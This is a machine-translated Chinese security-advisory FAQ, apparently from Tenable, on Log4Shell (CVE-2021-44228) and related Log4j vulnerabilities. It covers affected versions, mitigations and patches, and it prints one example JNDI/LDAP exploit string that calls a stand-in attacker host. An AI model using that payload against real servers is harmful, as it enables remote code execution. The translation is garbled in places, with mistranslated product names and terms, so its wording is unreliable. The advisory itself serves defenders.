cve cve - 2021 - 44228 - 2021 - 45046, cve - 2021 - 4104:常见问题关于Log4Shell和相关的漏洞
![](http://www.yyueer.com/sites/default/files/images/articles/Blog-Research-General-Max-Quality_4.jpg)
相关的常见问题列表Log4Shell和相关的漏洞。
12月18日更新:Apache已经发布了Log4j版本2.17.0和宣布cve - 2021 - 45105,一个拒绝服务漏洞利用在非默认配置。这个博客已经更新的附加信息。
12月20日更新:站得住脚的发布了Windows和Linux审计来检测是否已正确建议缓解措施上实现系统,无法修补。下面可以找到更多的信息。
1月4日更新:2.3.2 Apache Log4j 2.17.1发布,2.12.4和解决一个新的漏洞,cve - 2021 - 44832。有关更多信息,请参阅这篇文章站得住脚的社区。
背景
后,发现Apache Log4j漏洞被称为Log4Shell12月9日,安全响应团队放在一起以下博客回答一些常见问题(FAQ)的Log4j Log4Shell和新公布的漏洞。
常见问题解答
Log4j是什么?
Log4j是一个广泛使用的Java日志库中包含Apache日志服务。它用于日志消息从一个应用程序或服务,通常用于调试目的。
cve - 2021 - 44228是什么?
cve - 2021 - 44228(远端控制设备)是一个远程代码执行漏洞通过2.14.1在Apache Log4j 2.0。它被称为Log4Shell安全研究人员。
如何利用cve - 2021 - 44228吗吗?
远程,未经身份验证的攻击者可以利用这个缺陷,特别精心设计将请求发送给一个服务器运行一个脆弱的log4j版本。这可以通过提交一个网站或利用字符串到一个文本字段,包括利用字符串作为HTTP报头的一部分运往一个脆弱的服务器。如果脆弱的服务器使用log4j日志请求,恶意代码利用将请求从一个attacker-controlled服务器通过Java命名和目录接口(JNDI)的各种服务,如轻量级目录访问协议(LDAP)。
利用一个例子会看起来像这样:
$ {jndi: ldap: / /attackersite.com/exploit.class}
如果是利用该漏洞会怎样?
脆弱的log4j图书馆将从attacker-controlled服务器请求并执行恶意代码。
我们在野外看到任何攻击吗?
攻击者已经开始使用Log4Shell以各种方式,包括:
- Cryptocurrency矿业软件(cryptominers)
- 分布式拒绝服务(DDoS)僵尸网络
- Ransomware
有报道称国家组织和首次访问代理已经开始利用缺陷,这意味着我们应该期待先进的持续威胁(APT)组和ransomware子公司可能会利用缺陷在不久的将来。
为什么Log4Shell大不了?
Log4j图书馆是一种广泛使用的产品和服务日志的目的,创建一个大型攻击表面。利用Log4Shell很简单,容易获得GitHub上概念验证代码。最后,因为许多组织不知道这图书馆是多么普遍在他们所使用的产品和服务,这将可能产生长期的影响。
在Log4j 2.15.0 Log4Shell解决吗?
不,ApacheLog4j 2.16.0发布解决一个不完整的修复Log4Shell。Apache分配一个新的CVE这个不完整的解决办法:cve - 2021 - 45046。
cve - 2021 - 45046是什么?
cve - 2021 - 45046最初报道的拒绝服务漏洞通过2.15.0 Apache Log4j 2.0,和已经被升级到一个远端控制设备。特定的非默认配置下一个上下文查询(例如:$ $ {ctx: loginId}),攻击者工艺品JNDI查找使用恶意输入数据能够导致一个DoS条件或一个脆弱的服务器上实现远端控制设备使用Log4j 2。
的缓解Log4Shell适用于cve - 2021 - 45046吗?
不。根据Apache,前面的缓解cve - 2021 - 44228 -将formatMsgNoLookups设置为true -是一个不够完全缓解。指导未能占其他代码路径信息查找可能发生。正因为如此,Apache Log4j的现建议升级到一个安全的版本,从2.16.0和2.12.2 (Java 7)。如果这是不可能的,Apache建议删除JndiLookup类路径中。
释放Log4j 2.16.0做什么?
基于发布说明,Apache选择了硬Log4j通过删除信息查找和禁用默认JNDI。
我的组织使用Java 7和我们不能升级到Log4j 2.16.0。我们做什么呢?
Apache Log4j 2.12.2解决cve发布Java 7 - 2021 - 45046。如果直接修补是不可能的,Apache建议删除JndiLookup类的类路径中。指导如何消除这类路径中可以找到Apache文档。
cve - 2021 - 45105是什么?
cve - 2021 - 45105是一个新发布的拒绝服务(DoS)漏洞在Apache Log4j。脆弱性是可利用的在非默认配置。攻击者可以发送的请求包含一个递归查找这会导致一个DoS条件。解决漏洞,Apache 2.17.0 Log4j版本发布。另外,Apache提供缓解选项对于那些不能马上升级。我们建议审查Apache的安全咨询页面经常更新可能会继续在推荐的措施之一是新发展起来。
Log4j 1。x脆弱?
还有很多信息围绕Log4Shell出来。在这个博客发表的时候,Apache说,Log4j 1.2是脆弱的以类似的方式在Log4j配置为使用JMSAppender,这不是默认配置的一部分,但不是特别容易cve - 2021 - 44228。这个漏洞在Log4j 1.2已分配cve - 2021 - 4104。
有可供Log4j 1.2补丁吗?
不,Log4j分支1。x生活已结束(EOL)状态,因此得不到安全更新。用户要求升级到Log4j 2.12.2 (Java 7)或2.16.0或更高。
我怎么称呼cve - 2021 - 4104吗?
有一些缓解选项可以用来防止剥削的cve - 2021 - 4104。
- 不使用Log4j配置中的JMSAppender
- 删除JMSAppender类文件(org/apache/log4j/net/JMSAppender.class)
- 限制操作系统用户访问,以防止攻击者能够修改Log4j配置
这里的故事是所有这些漏洞?
我们知道在12月18日:
- 四个cf已经分配了漏洞影响Log4j
CVE | 漏洞类型 | 影响Log4j版本 | 非默认配置 |
---|---|---|---|
cve - 2021 - 44228 | 远端控制设备 | 2.0通过2.14.1 | 没有 |
cve - 2021 - 45046 | 拒绝服务(DoS)和远端控制设备 | 2.0通过2.15.0 | 是的 |
cve - 2021 - 4104 | 远端控制设备 | 1.2 * | 是的 |
cve - 2021 - 45105 | 拒绝服务(DoS) | 2.0 -beta9 2.16.0 | 是的 |
- 只有cve - 2021 - 44228时可利用的开箱即用的Log4j版本2.0通过2.14.1包括图书馆的应用程序和服务
- cve cve - 2021 - 45046 - 2021 - 4104和cve - 2021 - 45105只出现在某些非默认配置
- cve - 2021 - 4104将不会被修补,Log4j 1。x分行已经走到尽头
有什么固定的Log4j版本解决这些漏洞?
Log4j版本 | Java版本 | 版本的可用性 |
---|---|---|
2.17.0 | Java 8 | 是的 |
2.16.0 | Java 8 | 是的 |
2.12.2 | Java 7 | 是的 |
1.2 | - - - - - - | 没有(EOL) |
利用这些漏洞的可能性是什么?
下表总结了可利用性以及是否漏洞已经被剥削。
CVE | 开发的可能性 | 已经利用 |
---|---|---|
cve - 2021 - 44228 | 高 | 是的 |
cve - 2021 - 45046 | 低 | 没有 |
cve - 2021 - 4104 | 低 | 没有 |
cve - 2021 - 45105 | 低 | 没有 |
站得住脚的容易受到Log4j的漏洞吗?
站得住脚的CISO鲍勃·胡贝尔已经发布了一个完整的声明中可以找到在这里。
是什么方法我在Log4j /我的组织可以识别这些漏洞?
成立了许多插件,扫描模板和仪表板(Tenable.io,Tenable.sc)我们的产品。
顾客不能立即修补这些漏洞,可以使用cve - 2021 - 44228 / cve - 2021 - 45046年审计检测是否Log4j正确应对解决方案已经应用在他们的系统上。更详细的描述可以找到这些审计在这里。
cve - 2021 - 44832是什么?
cve - 2021 - 44832是一个新发现的漏洞最近修补的Apache Log4j。利用这一缺陷可能小于由于开发所需的先决条件。关于这个漏洞的更多信息,请参阅这篇文章站得住脚的社区。
获得更多的信息
加入站不住脚的安全响应团队站得住脚的社区。
了解更多关于站得住脚的,第一个网络曝光平台整体管理的现代攻击表面。
得到一个天的免费试用站得住脚的。io脆弱性管理。